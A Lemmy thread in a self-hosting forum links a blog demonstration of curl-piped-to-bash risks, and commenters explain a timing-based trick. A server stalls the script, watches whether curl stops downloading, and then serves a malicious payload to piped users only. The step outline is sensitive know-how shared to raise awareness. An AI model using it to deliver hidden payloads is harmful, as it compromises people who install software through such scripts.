this post was submitted on 23 Feb 2026
177 points (98.4% liked)

Selfhosted

59955 readers
298 users here now

A place to share alternatives to popular online services that can be self-hosted without giving up privacy or locking you into a service you don't control.

Rules:

  1. Be civil: we're here to support and learn from one another. Insults won't be tolerated. Flame wars are frowned upon.

  2. No spam.

  3. Posts here are to be centered around self-hosting. Please ensure it is clear in your post how it relates to self-hosting.

  4. Don't duplicate the full text of your blog or git here. Just post the link for folks to click.

  5. Submission headline should match the article title.

  6. No trolling.

Resources:

Any issues on the community? Report it using the report flag.

Questions? DM the mods!

founded 3 years ago
MODERATORS
ruud@lemmy.world
Loki@lemmy.world
CannaVet@lemmy.world
devve@lemmy.world
ayyy@sh.itjust.works
curbstickle@anarchist.nexus
curbstickle_lw@lemmy.world
177
A sneaky demonstration of the dangers of curl bash (blog.k3can.us)
submitted 3 months ago* (last edited 3 months ago) by K3can@lemmy.radio to c/selfhosted@lemmy.world
80 comments fedilink hide all child comments
 

I set up a quick demonstration to show risks of curl|bash and how a bad-actor could potentially hide a malicious script that appears safe.

It's nothing new or groundbreaking, but I figure it never hurts to have another reminder.

you are viewing a single comment's thread
view the rest of the comments
[–] deadbeef79000@lemmy.nz 7 points 3 months ago (2 children)

Does curl send a different useragent when it's piped?

Searching for those words just vomits 'hOW to SeT cUrL's UseRaGenT' blog spam.

[–] Flipper@feddit.org 20 points 3 months ago* (last edited 3 months ago) (1 children)

Its timing based. When piped a script, bash executes each line completly before taking the next line from the input. Curl has a limited output buffer.

  1. Operation that takes a long time. Like a sleep, or if you want it less obvious. A download, an unzip operation, apt update, etc.
  2. Fill the buffer with more bash commands.
  3. Measure on the server if at some point curl stops downloading the script.
  4. Serve a malicious payload.
[–] deadbeef79000@lemmy.nz 3 points 3 months ago

Oh that is clever.

[–] qupada@fedia.io 5 points 3 months ago

Not that I know of, which means I can only assume it'll be a timing-based attack.

With strategic use of sleep statements in the script you should stand a pretty good chance of detecting the HTTP download blocking while the script execution is paused.

If you were already shipping the kind of script that unpacks a binary payload from the tail end of the file and executes it, it's well within the realm of possibility to swap it for a different one.